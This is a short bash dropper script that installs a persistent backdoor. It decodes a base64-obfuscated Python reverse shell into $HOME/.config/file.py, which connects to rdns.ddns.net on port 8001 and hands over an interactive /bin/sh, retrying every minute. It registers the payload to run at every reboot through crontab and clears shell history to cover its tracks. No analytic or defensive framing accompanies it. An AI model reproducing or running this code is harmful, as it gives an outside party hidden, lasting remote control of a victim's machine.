#!/bin/bash
mkdir $HOME/.config
echo "aW1wb3J0IHNvY2tldAppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgb3MKaW1wb3J0IHRpbWUKCmRlZiBjb25uKCk6CglzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQoJcy5jb25uZWN0KCgicmRucy5kZG5zLm5ldCIsODAwMSkpCglvcy5kdXAyKHMuZmlsZW5vKCksMCkKCW9zLmR1cDIocy5maWxlbm8oKSwxKQoJb3MuZHVwMihzLmZpbGVubygpLDIpCglwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6Cgl3aGlsZSBUcnVlOgoJCXRyeToKCQkJY29ubigpCgkJZXhjZXB0OgoJCQlwYXNzCgkJdGltZS5zbGVlcCg2MCkK" | base64 -d  > $HOME/.config/file.py
echo "@reboot python3 $HOME/.config/file.py" >> $HOME/.config/cron
crontab $HOME/.config/cron
rm $HOME/.config/cron
HISTFILE=/dev/null
